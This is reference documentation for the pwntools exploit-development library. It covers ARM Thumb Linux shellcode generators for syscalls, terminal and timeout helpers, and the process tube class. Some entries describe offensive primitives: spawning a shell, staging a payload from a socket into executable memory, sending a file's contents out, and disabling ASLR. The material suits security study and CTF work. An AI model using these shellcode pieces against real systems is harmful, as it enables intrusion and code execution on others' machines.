pwnlib.shellcraft.thumb.linux.
mq_open
(name, oflag, vararg)[source]¶ Invokes the syscall mq_open. See ‘man 2 mq_open’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
mq_timedreceive
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedreceive. See ‘man 2 mq_timedreceive’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.thumb.linux.
mq_timedsend
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedsend. See ‘man 2 mq_timedsend’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.thumb.linux.
mq_unlink
(name)[source]¶ Invokes the syscall mq_unlink. See ‘man 2 mq_unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.thumb.linux.
mremap
(addr, old_len, new_len, flags, vararg)[source]¶ Invokes the syscall mremap. See ‘man 2 mremap’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
msync
(addr, length, flags)[source]¶ Invokes the syscall msync. See ‘man 2 msync’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- flags (int) – flags
-
pwnlib.shellcraft.thumb.linux.
munlock
(addr, length)[source]¶ Invokes the syscall munlock. See ‘man 2 munlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.thumb.linux.
munlockall
()[source]¶ Invokes the syscall munlockall. See ‘man 2 munlockall’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
munmap
(addr, length)[source]¶ Invokes the syscall munmap. See ‘man 2 munmap’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.thumb.linux.
nanosleep
(requested_time, remaining)[source]¶ Invokes the syscall nanosleep. See ‘man 2 nanosleep’ for more information.
Parameters: - requested_time (timespec) – requested_time
- remaining (timespec) – remaining
-
pwnlib.shellcraft.thumb.linux.
nice
(inc)[source]¶ Invokes the syscall nice. See ‘man 2 nice’ for more information.
Parameters: inc (int) – inc
-
pwnlib.shellcraft.thumb.linux.
open
(file, oflag, vararg)[source]¶ Invokes the syscall open. See ‘man 2 open’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
openat
(fd, file, oflag, vararg)[source]¶ Invokes the syscall openat. See ‘man 2 openat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
pause
()[source]¶ Invokes the syscall pause. See ‘man 2 pause’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
pipe
(pipedes)[source]¶ Invokes the syscall pipe. See ‘man 2 pipe’ for more information.
Parameters: pipedes (int) – pipedes
-
pwnlib.shellcraft.thumb.linux.
pipe2
(pipedes, flags)[source]¶ Invokes the syscall pipe2. See ‘man 2 pipe2’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
poll
(fds, nfds, timeout)[source]¶ Invokes the syscall poll. See ‘man 2 poll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (int) – timeout
-
pwnlib.shellcraft.thumb.linux.
ppoll
(fds, nfds, timeout, ss)[source]¶ Invokes the syscall ppoll. See ‘man 2 ppoll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (timespec) – timeout
- ss (sigset_t) – ss
-
pwnlib.shellcraft.thumb.linux.
prctl
(option, vararg)[source]¶ Invokes the syscall prctl. See ‘man 2 prctl’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
pread
(fd, buf, nbytes, offset)[source]¶ Invokes the syscall pread. See ‘man 2 pread’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
- offset (off_t) – offset
-
pwnlib.shellcraft.thumb.linux.
preadv
(fd, iovec, count, offset)[source]¶ Invokes the syscall preadv. See ‘man 2 preadv’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
prlimit64
(pid, resource, new_limit, old_limit)[source]¶ Invokes the syscall prlimit64. See ‘man 2 prlimit64’ for more information.
Parameters: - pid (pid_t) – pid
- resource (rlimit_resource) – resource
- new_limit (rlimit64) – new_limit
- old_limit (rlimit64) – old_limit
-
pwnlib.shellcraft.thumb.linux.
profil
(sample_buffer, size, offset, scale)[source]¶ Invokes the syscall profil. See ‘man 2 profil’ for more information.
Parameters: - sample_buffer (unsigned) – sample_buffer
- size (size_t) – size
- offset (size_t) – offset
- scale (unsigned) – scale
-
pwnlib.shellcraft.thumb.linux.
ptrace
(request, vararg)[source]¶ Invokes the syscall ptrace. See ‘man 2 ptrace’ for more information.
Parameters: - request (ptrace_request) – request
- vararg (int) – vararg
-
pwnlib.shellcraft.thumb.linux.
push
(value)[source]¶ Pushes a value onto the stack without using null bytes or newline characters.
If src is a string, then we try to evaluate with context.arch = ‘thumb’ using
pwnlib.constants.eval()
before determining how to push it. Note that this means that this shellcode can change behavior depending on the value of context.os.Parameters: value (int,str) – The value or register to push Example
>>> print pwnlib.shellcraft.thumb.push('r0').rstrip() push {r0} >>> print pwnlib.shellcraft.thumb.push(0).rstrip() /* push 0 */ eor r7, r7 push {r7} >>> print pwnlib.shellcraft.thumb.push(1).rstrip() /* push 1 */ mov r7, #1 push {r7} >>> print pwnlib.shellcraft.thumb.push(256).rstrip() /* push 256 */ mov r7, #0x100 push {r7} >>> print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ mov r7, #0xb push {r7} >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ mov r7, #0x3b push {r7}
-
pwnlib.shellcraft.thumb.linux.
putpmsg
(fildes, ctlptr, dataptr, band, flags)[source]¶ Invokes the syscall putpmsg. See ‘man 2 putpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
pwrite
(fd, buf, n, offset)[source]¶ Invokes the syscall pwrite. See ‘man 2 pwrite’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- n (size_t) – n
- offset (off_t) – offset
-
pwnlib.shellcraft.thumb.linux.
pwritev
(fd, iovec, count, offset)[source]¶ Invokes the syscall pwritev. See ‘man 2 pwritev’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
read
(fd, buf, nbytes)[source]¶ Invokes the syscall read. See ‘man 2 read’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
-
pwnlib.shellcraft.thumb.linux.
readahead
(fd, offset, count)[source]¶ Invokes the syscall readahead. See ‘man 2 readahead’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (size_t) – count
-
pwnlib.shellcraft.thumb.linux.
readdir
(dirp)[source]¶ Invokes the syscall readdir. See ‘man 2 readdir’ for more information.
Parameters: dirp (DIR) – dirp
-
pwnlib.shellcraft.thumb.linux.
readfile
(path, dst='r6')[source]¶ Args: [path, dst (imm/reg) = r6 ] Opens the specified file path and sends its content to the specified file descriptor. Leaves the destination file descriptor in r6 and the input file descriptor in r5.
-
pwnlib.shellcraft.thumb.linux.
readlink
(path, buf, length)[source]¶ Invokes the syscall readlink. See ‘man 2 readlink’ for more information.
Parameters: - path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.thumb.linux.
readlinkat
(fd, path, buf, length)[source]¶ Invokes the syscall readlinkat. See ‘man 2 readlinkat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.thumb.linux.
readn
(fd, buf, nbytes)[source]¶ Reads exactly nbytes bytes from file descriptor fd into the buffer buf.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
-
pwnlib.shellcraft.thumb.linux.
readv
(fd, iovec, count)[source]¶ Invokes the syscall readv. See ‘man 2 readv’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
recv
(fd, buf, n, flags)[source]¶ Invokes the syscall recv. See ‘man 2 recv’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
recvfrom
(fd, buf, n, flags, addr, addr_len)[source]¶ Invokes the syscall recvfrom. See ‘man 2 recvfrom’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
recvmmsg
(fd, vmessages, vlen, flags, tmo)[source]¶ Invokes the syscall recvmmsg. See ‘man 2 recvmmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
recvmsg
(fd, message, flags)[source]¶ Invokes the syscall recvmsg. See ‘man 2 recvmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
recvsize
(sock, reg='r1')[source]¶ Recives 4 bytes size field Useful in conjuncion with findpeer and stager :param sock, the socket to read the payload from.: :param reg, the place to put the size: :type reg, the place to put the size: default ecx
Leaves socket in ebx
-
pwnlib.shellcraft.thumb.linux.
remap_file_pages
(start, size, prot, pgoff, flags)[source]¶ Invokes the syscall remap_file_pages. See ‘man 2 remap_file_pages’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
rename
(old, new)[source]¶ Invokes the syscall rename. See ‘man 2 rename’ for more information.
Parameters: - old (char) – old
- new (char) – new
-
pwnlib.shellcraft.thumb.linux.
renameat
(oldfd, old, newfd, new)[source]¶ Invokes the syscall renameat. See ‘man 2 renameat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
rmdir
(path)[source]¶ Invokes the syscall rmdir. See ‘man 2 rmdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.thumb.linux.
sched_get_priority_max
(algorithm)[source]¶ Invokes the syscall sched_get_priority_max. See ‘man 2 sched_get_priority_max’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.thumb.linux.
sched_get_priority_min
(algorithm)[source]¶ Invokes the syscall sched_get_priority_min. See ‘man 2 sched_get_priority_min’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.thumb.linux.
sched_getaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_getaffinity. See ‘man 2 sched_getaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.thumb.linux.
sched_getparam
(pid, param)[source]¶ Invokes the syscall sched_getparam. See ‘man 2 sched_getparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.thumb.linux.
sched_getscheduler
(pid)[source]¶ Invokes the syscall sched_getscheduler. See ‘man 2 sched_getscheduler’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.thumb.linux.
sched_rr_get_interval
(pid, t)[source]¶ Invokes the syscall sched_rr_get_interval. See ‘man 2 sched_rr_get_interval’ for more information.
Parameters: - pid (pid_t) – pid
- t (timespec) – t
-
pwnlib.shellcraft.thumb.linux.
sched_setaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_setaffinity. See ‘man 2 sched_setaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.thumb.linux.
sched_setparam
(pid, param)[source]¶ Invokes the syscall sched_setparam. See ‘man 2 sched_setparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.thumb.linux.
sched_setscheduler
(pid, policy, param)[source]¶ Invokes the syscall sched_setscheduler. See ‘man 2 sched_setscheduler’ for more information.
Parameters: - pid (pid_t) – pid
- policy (int) – policy
- param (sched_param) – param
-
pwnlib.shellcraft.thumb.linux.
sched_yield
()[source]¶ Invokes the syscall sched_yield. See ‘man 2 sched_yield’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
select
(nfds, readfds, writefds, exceptfds, timeout)[source]¶ Invokes the syscall select. See ‘man 2 select’ for more information.
Parameters: - nfds (int) – nfds
- readfds (fd_set) – readfds
- writefds (fd_set) – writefds
- exceptfds (fd_set) – exceptfds
- timeout (timeval) – timeout
-
pwnlib.shellcraft.thumb.linux.
sendfile
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile. See ‘man 2 sendfile’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
sendfile64
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile64. See ‘man 2 sendfile64’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
setdomainname
(name, length)[source]¶ Invokes the syscall setdomainname. See ‘man 2 setdomainname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.thumb.linux.
setgid
(gid)[source]¶ Invokes the syscall setgid. See ‘man 2 setgid’ for more information.
Parameters: gid (gid_t) – gid
-
pwnlib.shellcraft.thumb.linux.
setgroups
(n, groups)[source]¶ Invokes the syscall setgroups. See ‘man 2 setgroups’ for more information.
Parameters: - n (size_t) – n
- groups (gid_t) – groups
-
pwnlib.shellcraft.thumb.linux.
sethostname
(name, length)[source]¶ Invokes the syscall sethostname. See ‘man 2 sethostname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.thumb.linux.
setitimer
(which, new, old)[source]¶ Invokes the syscall setitimer. See ‘man 2 setitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- new (itimerval) – new
- old (itimerval) – old
-
pwnlib.shellcraft.thumb.linux.
setpgid
(pid, pgid)[source]¶ Invokes the syscall setpgid. See ‘man 2 setpgid’ for more information.
Parameters: - pid (pid_t) – pid
- pgid (pid_t) – pgid
-
pwnlib.shellcraft.thumb.linux.
setpriority
(which, who, prio)[source]¶ Invokes the syscall setpriority. See ‘man 2 setpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
- prio (int) – prio
-
pwnlib.shellcraft.thumb.linux.
setregid
(rgid, egid)[source]¶ Invokes the syscall setregid. See ‘man 2 setregid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
-
pwnlib.shellcraft.thumb.linux.
setresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall setresgid. See ‘man 2 setresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.thumb.linux.
setresuid
(ruid, euid, suid)[source]¶ Invokes the syscall setresuid. See ‘man 2 setresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.thumb.linux.
setreuid
(ruid, euid)[source]¶ Invokes the syscall setreuid. See ‘man 2 setreuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
-
pwnlib.shellcraft.thumb.linux.
setrlimit
(resource, rlimits)[source]¶ Invokes the syscall setrlimit. See ‘man 2 setrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.thumb.linux.
setsid
()[source]¶ Invokes the syscall setsid. See ‘man 2 setsid’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
settimeofday
(tv, tz)[source]¶ Invokes the syscall settimeofday. See ‘man 2 settimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone) – tz
-
pwnlib.shellcraft.thumb.linux.
setuid
(uid)[source]¶ Invokes the syscall setuid. See ‘man 2 setuid’ for more information.
Parameters: uid (uid_t) – uid
-
pwnlib.shellcraft.thumb.linux.
sh
()[source]¶ Execute a different process.
>>> p = run_assembly(shellcraft.thumb.linux.sh()) >>> p.sendline('echo Hello') >>> p.recv() 'Hello\n'
-
pwnlib.shellcraft.thumb.linux.
sigaction
(sig, act, oact)[source]¶ Invokes the syscall sigaction. See ‘man 2 sigaction’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
sigaltstack
(ss, oss)[source]¶ Invokes the syscall sigaltstack. See ‘man 2 sigaltstack’ for more information.
Parameters: - ss (sigaltstack) – ss
- oss (sigaltstack) – oss
-
pwnlib.shellcraft.thumb.linux.
signal
(sig, handler)[source]¶ Invokes the syscall signal. See ‘man 2 signal’ for more information.
Parameters: - sig (int) – sig
- handler (sighandler_t) – handler
-
pwnlib.shellcraft.thumb.linux.
sigpending
(set)[source]¶ Invokes the syscall sigpending. See ‘man 2 sigpending’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.thumb.linux.
sigprocmask
(how, set, oset)[source]¶ Invokes the syscall sigprocmask. See ‘man 2 sigprocmask’ for more information.
Parameters: - how (int) – how
- set (sigset_t) – set
- oset (sigset_t) – oset
-
pwnlib.shellcraft.thumb.linux.
sigreturn
(scp)[source]¶ Invokes the syscall sigreturn. See ‘man 2 sigreturn’ for more information.
-
pwnlib.shellcraft.thumb.linux.
sigsuspend
(set)[source]¶ Invokes the syscall sigsuspend. See ‘man 2 sigsuspend’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.thumb.linux.
splice
(fdin, offin, fdout, offout, length, flags)[source]¶ Invokes the syscall splice. See ‘man 2 splice’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
stage
(fd=0, length=None)[source]¶ Migrates shellcode to a new buffer.
Parameters: Example
>>> p = run_assembly(shellcraft.stage()) >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) >>> p.pack(len(sc)) >>> p.send(sc) >>> p.recvline() 'Hello\n'
-
pwnlib.shellcraft.thumb.linux.
stager
(sock, size)[source]¶ Read ‘size’ bytes from ‘sock’ and place them in an executable buffer and jump to it. The socket will be left in r6.
-
pwnlib.shellcraft.thumb.linux.
stat
(file, buf)[source]¶ Invokes the syscall stat. See ‘man 2 stat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.thumb.linux.
stat64
(file, buf)[source]¶ Invokes the syscall stat64. See ‘man 2 stat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.thumb.linux.
stime
(when)[source]¶ Invokes the syscall stime. See ‘man 2 stime’ for more information.
Parameters: when (time_t) – when
-
pwnlib.shellcraft.thumb.linux.
stty
(fd, params)[source]¶ Invokes the syscall stty. See ‘man 2 stty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.thumb.linux.
symlink
(from_, to)[source]¶ Invokes the syscall symlink. See ‘man 2 symlink’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.thumb.linux.
symlinkat
(from_, tofd, to)[source]¶ Invokes the syscall symlinkat. See ‘man 2 symlinkat’ for more information.
Parameters: - from (char) – from
- tofd (int) – tofd
- to (char) – to
-
pwnlib.shellcraft.thumb.linux.
sync
()[source]¶ Invokes the syscall sync. See ‘man 2 sync’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
sync_file_range
(fd, offset, count, flags)[source]¶ Invokes the syscall sync_file_range. See ‘man 2 sync_file_range’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (off64_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.thumb.linux.
syscall
(syscall=None, arg0=None, arg1=None, arg2=None, arg3=None, arg4=None, arg5=None, arg6=None)[source]¶ - Args: [syscall_number, *args]
- Does a syscall
Any of the arguments can be expressions to be evaluated by
pwnlib.constants.eval()
.Example
>>> print shellcraft.thumb.linux.syscall(11, 1, 'sp', 2, 0).rstrip() /* call syscall(11, 1, 'sp', 2, 0) */ mov r0, #1 mov r1, sp mov r2, #2 eor r3, r3 mov r7, #0xb svc 0x41 >>> print shellcraft.thumb.linux.syscall('SYS_exit', 0).rstrip() /* call exit(0) */ eor r0, r0 mov r7, #(SYS_exit) /* 1 */ svc 0x41
-
pwnlib.shellcraft.thumb.linux.
syslog
(pri, fmt, vararg)[source]¶ Invokes the syscall syslog. See ‘man 2 syslog’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
tee
(fdin, fdout, length, flags)[source]¶ Invokes the syscall tee. See ‘man 2 tee’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
time
(timer)[source]¶ Invokes the syscall time. See ‘man 2 time’ for more information.
Parameters: timer (time_t) – timer
-
pwnlib.shellcraft.thumb.linux.
timer_create
(clock_id, evp, timerid)[source]¶ Invokes the syscall timer_create. See ‘man 2 timer_create’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- evp (sigevent) – evp
- timerid (timer_t) – timerid
-
pwnlib.shellcraft.thumb.linux.
timer_delete
(timerid)[source]¶ Invokes the syscall timer_delete. See ‘man 2 timer_delete’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.thumb.linux.
timer_getoverrun
(timerid)[source]¶ Invokes the syscall timer_getoverrun. See ‘man 2 timer_getoverrun’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.thumb.linux.
timer_gettime
(timerid, value)[source]¶ Invokes the syscall timer_gettime. See ‘man 2 timer_gettime’ for more information.
Parameters: - timerid (timer_t) – timerid
- value (itimerspec) – value
-
pwnlib.shellcraft.thumb.linux.
timer_settime
(timerid, flags, value, ovalue)[source]¶ Invokes the syscall timer_settime. See ‘man 2 timer_settime’ for more information.
Parameters: - timerid (timer_t) – timerid
- flags (int) – flags
- value (itimerspec) – value
- ovalue (itimerspec) – ovalue
-
pwnlib.shellcraft.thumb.linux.
truncate
(file, length)[source]¶ Invokes the syscall truncate. See ‘man 2 truncate’ for more information.
Parameters: - file (char) – file
- length (off_t) – length
-
pwnlib.shellcraft.thumb.linux.
truncate64
(file, length)[source]¶ Invokes the syscall truncate64. See ‘man 2 truncate64’ for more information.
Parameters: - file (char) – file
- length (off64_t) – length
-
pwnlib.shellcraft.thumb.linux.
ulimit
(cmd, vararg)[source]¶ Invokes the syscall ulimit. See ‘man 2 ulimit’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
umask
(mask)[source]¶ Invokes the syscall umask. See ‘man 2 umask’ for more information.
Parameters: mask (mode_t) – mask
-
pwnlib.shellcraft.thumb.linux.
uname
(name)[source]¶ Invokes the syscall uname. See ‘man 2 uname’ for more information.
Parameters: name (utsname) – name
-
pwnlib.shellcraft.thumb.linux.
unlink
(name)[source]¶ Invokes the syscall unlink. See ‘man 2 unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.thumb.linux.
unlinkat
(fd, name, flag)[source]¶ Invokes the syscall unlinkat. See ‘man 2 unlinkat’ for more information.
Parameters:
Invokes the syscall unshare. See ‘man 2 unshare’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.thumb.linux.
ustat
(dev, ubuf)[source]¶ Invokes the syscall ustat. See ‘man 2 ustat’ for more information.
Parameters: - dev (dev_t) – dev
- ubuf (ustat) – ubuf
-
pwnlib.shellcraft.thumb.linux.
utime
(file, file_times)[source]¶ Invokes the syscall utime. See ‘man 2 utime’ for more information.
Parameters: - file (char) – file
- file_times (utimbuf) – file_times
-
pwnlib.shellcraft.thumb.linux.
utimensat
(fd, path, times, flags)[source]¶ Invokes the syscall utimensat. See ‘man 2 utimensat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
utimes
(file, tvp)[source]¶ Invokes the syscall utimes. See ‘man 2 utimes’ for more information.
Parameters: - file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.thumb.linux.
vfork
()[source]¶ Invokes the syscall vfork. See ‘man 2 vfork’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
vhangup
()[source]¶ Invokes the syscall vhangup. See ‘man 2 vhangup’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
vmsplice
(fdout, iov, count, flags)[source]¶ Invokes the syscall vmsplice. See ‘man 2 vmsplice’ for more information.
Parameters: - fdout (int) – fdout
- iov (iovec) – iov
- count (size_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.thumb.linux.
wait4
(pid, stat_loc, options, usage)[source]¶ Invokes the syscall wait4. See ‘man 2 wait4’ for more information.
Parameters: - pid (pid_t) – pid
- stat_loc (WAIT_STATUS) – stat_loc
- options (int) – options
- usage (rusage) – usage
-
pwnlib.shellcraft.thumb.linux.
waitid
(idtype, id, infop, options)[source]¶ Invokes the syscall waitid. See ‘man 2 waitid’ for more information.
Parameters: - idtype (idtype_t) – idtype
- id (id_t) – id
- infop (siginfo_t) – infop
- options (int) – options
-
pwnlib.shellcraft.thumb.linux.
waitpid
(pid, stat_loc, options)[source]¶ Invokes the syscall waitpid. See ‘man 2 waitpid’ for more information.
Parameters:
pwnlib.term
— Terminal handling¶
-
pwnlib.term.
can_init
()[source]¶ This function returns True iff stderr is a TTY and we are not inside a REPL. Iff this function returns True, a call to
init()
will letpwnlib
manage the terminal.
-
pwnlib.term.
init
()[source]¶ Calling this function will take over the terminal (iff
can_init()
returns True) until the current python interpreter is closed.It is on our TODO, to create a function to “give back” the terminal without closing the interpreter.
pwnlib.timeout
— Timeout handling¶
Timeout encapsulation, complete with countdowns and scope managers.
-
class
pwnlib.timeout.
Timeout
(timeout=pwnlib.timeout.Timeout.default)[source]¶ Implements a basic class which has a timeout, and support for scoped timeout countdowns.
Valid timeout values are:
Timeout.default
use the global default value (context.default
)Timeout.forever
orNone
never time out- Any positive float, indicates timeouts in seconds
Example
>>> context.timeout = 30 >>> t = Timeout() >>> t.timeout == 30 True >>> t = Timeout(5) >>> t.timeout == 5 True >>> i = 0 >>> with t.countdown(): ... print (4 <= t.timeout and t.timeout <= 5) ... True >>> with t.countdown(0.5): ... while t.timeout: ... print round(t.timeout,1) ... time.sleep(0.1) 0.5 0.4 0.3 0.2 0.1 >>> print t.timeout 5.0 >>> with t.local(0.5): ... for i in range(5): ... print round(t.timeout,1) ... time.sleep(0.1) 0.5 0.5 0.5 0.5 0.5 >>> print t.timeout 5.0
-
countdown
(timeout=pwnlib.timeout.Timeout.default)[source]¶ Scoped timeout setter. Sets the timeout within the scope, and restores it when leaving the scope.
When accessing
timeout
within the scope, it will be calculated against the time when the scope was entered, in a countdown fashion.If
None
is specified fortimeout
, then the current timeout is used is made. This allowsNone
to be specified as a default argument with less complexity.
-
default
= pwnlib.timeout.Timeout.default[source]¶ Value indicating that the timeout should not be changed
-
local
(timeout)[source]¶ Scoped timeout setter. Sets the timeout within the scope, and restores it when leaving the scope.
pwnlib.tubes
— Talking to the World!¶
The pwnlib is not a big truck! It’s a series of tubes!
This is our library for talking to sockets, processes, ssh connections etc. Our goal is to be able to use the same API for e.g. remote TCP servers, local TTY-programs and programs run over over SSH.
It is organized such that the majority of the functionality is implemented
in pwnlib.tubes.tube
. The remaining classes should only implement
just enough for the class to work and possibly code pertaining only to
that specific kind of tube.
Types of Tubes¶
pwnlib.tubes.process
— Processes¶
-
class
pwnlib.tubes.process.
process
(argv, shell=False, executable=None, cwd=None, env=None, timeout=pwnlib.timeout.Timeout.default, stdin=-1, stdout=<pwnlib.tubes.process.PTY object>, stderr=-2, level=None, close_fds=True, preexec_fn=<function <lambda>>, raw=True, aslr=None, setuid=None, where='local', display=None)[source]¶ Bases:
pwnlib.tubes.tube.tube
Spawns a new process, and wraps it with a tube for communication.
Parameters: - argv (list) – List of arguments to pass to the spawned process.
- shell (bool) – Set to True to interpret argv as a string to pass to the shell for interpretation instead of as argv.
- executable (str) – Path to the binary to execute. If
None
, usesargv[0]
. Cannot be used withshell
. - cwd (str) – Working directory. Uses the current working directory by default.
- env (dict) – Environment variables. By default, inherits from Python’s environment.
- timeout (int) – Timeout to use on
tube
recv
operations. - stdin (int) – File object or file descriptor number to use for
stdin
. By default, a pipe is used. A pty can be used instead by setting this toprocess.PTY
. This will cause programs to behave in an interactive manner (e.g..,python
will show a>>>
prompt). If the application reads from/dev/tty
directly, use a pty. - stdout (int) – File object or file descriptor number to use for
stdout
. By default, a pty is used so that any stdout buffering by libc routines is disabled. May also besubprocess.PIPE
to use a normal pipe. - stderr (int) – File object or file descriptor number to use for
stderr
. By default,stdout
is used. May also besubprocess.PIPE
to use a separate pipe, although thetube
wrapper will not be able to read this data. - close_fds (bool) – Close all open file descriptors except stdin, stdout, stderr.
By default,
True
is used. - preexec_fn (callable) – Callable to invoke immediately before calling
execve
. - raw (bool) – Set the created pty to raw mode (i.e. disable echo and control
characters).
True
by default. If no pty is created, this has no effect. - aslr (bool) –
If set to
False
, disable ASLR viapersonality
(setarch -R
) andsetrlimit
(ulimit -s unlimited
).This disables ASLR for the target process. However, the
setarch
changes are lost if asetuid
binary is executed.The default value is inherited from
context.aslr
. Seesetuid
below for additional options and information. - setuid (bool) –
Used to control setuid status of the target binary, and the corresponding actions taken.
By default, this value is
None
, so no assumptions are made.If
True
, treat the target binary assetuid
. This modifies the mechanisms used to disable ASLR on the process ifaslr=False
. This is useful for debugging locally, when the exploit is asetuid
binary.If
False
, preventsetuid
bits from taking effect on the target binary. This is only supported on Linux, with kernels v3.5 or greater. - where (str) – Where the process is running, used for logging purposes.
- display (list) – List of arguments to display, instead of the main executable name.
Examples
